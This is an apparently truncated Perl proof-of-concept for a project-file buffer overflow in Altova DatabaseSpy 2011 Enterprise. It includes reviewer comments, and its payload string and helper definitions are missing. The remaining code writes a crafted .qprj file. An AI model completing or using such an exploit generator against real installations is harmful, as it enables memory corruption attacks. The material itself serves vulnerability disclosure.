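#!/usr/bin/perl
#
#
# Title: Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability
#
#
# Vendor: Altova GmbH
# Product web page: http://www.altova.com
# Affected version: Enterprise Edition 2011
#
#
# Summary: Altova DatabaseSpy® 2011 is the unique multi-database query, design,
# and database comparison tool. It connects to all major databases, easing SQL
# editing, database structure design, database content editing, database schema
# and content comparison, and database conversion for a fraction of the cost of
# single-database solutions.
#
#
# Desc: The Altova DatabaseSpy 2011 Enterprise Edition suffers from a buffer
# overflow/memory corruption vulnerability when handling project files (.qprj).
# The issue is triggered because there is no boundary checking of some XML tag
# property values, ex:
#
# NOTE(review): the page is cut at this point. The rest of the advisory text,
# the definitions of $FILENAME and $PROJECT, and the header() sub are not on
# the page, so this listing is incomplete as shown. Only the tail of the
# $PROJECT string survives; it is kept verbatim below as a comment because it
# cannot stand as code without its missing beginning:
#
#   \xA\xA\xA\x9\xA\x9\xA\x9\xA\x9<". "Folder FolderName=\"Data Diff\" Type=\"DataDiffR". "ootFolder\"/>\xA\x9\xA\x9\xA\xA";
#
# Reading the description from the defending side: a .qprj project file is XML
# whose attribute values reach the parser without a length check, so project
# files from untrusted sources are untrusted input to the affected version.
# The page names no fixed version.

# code() - write the project-file contents held in $PROJECT to ./$FILENAME and
# report progress on the console.
#
# Reads the globals $FILENAME and $PROJECT (defined in the part of the file
# that is missing from the page). Takes no arguments and returns nothing
# useful. Dies if the output file cannot be opened, written or closed.
# Uses the `color` and `pause` console commands through system(), so it is
# presumably meant to be run from a Windows command prompt.
sub code()
{
    system("color 3");

    # Three-argument open with a lexical handle and low-precedence `or`.
    # The original `open qprj, ">./$FILENAME" || die ...` bound `||` to the
    # (always true) file-name string, so a failed open was never reported.
    open my $qprj, '>', "./$FILENAME"
        or die "\nCan't open #$_@ $FILENAME: $!";

    print "\n (1) ";
    system("pause");

    # NOTE(review): line breaks were lost on the page. The `#` that follows
    # system("pause") there is read as a decorative trailing comment, like the
    # other two in this sub, which makes this write live code - confirm
    # against the original listing.
    print {$qprj} $PROJECT
        or die "\nCan't write $FILENAME: $!";

    print "\n (2) Buffering malicious format file . . .\r\n";
    sleep 2;

    # Buffered write errors surface at close, so check it before claiming
    # success in step (3).
    close $qprj
        or die "\nCan't close $FILENAME: $!";

    print "\n (3) File $FILENAME created successfully!\n";
    sleep 2;

    system("color \x44");    # "\x44" is the letter D
    sleep 1;

    print "\n (4) And the color is changed.\n";
}

print "\n";
header();    # defined in the part of the file that is missing from the page
code();

#EOF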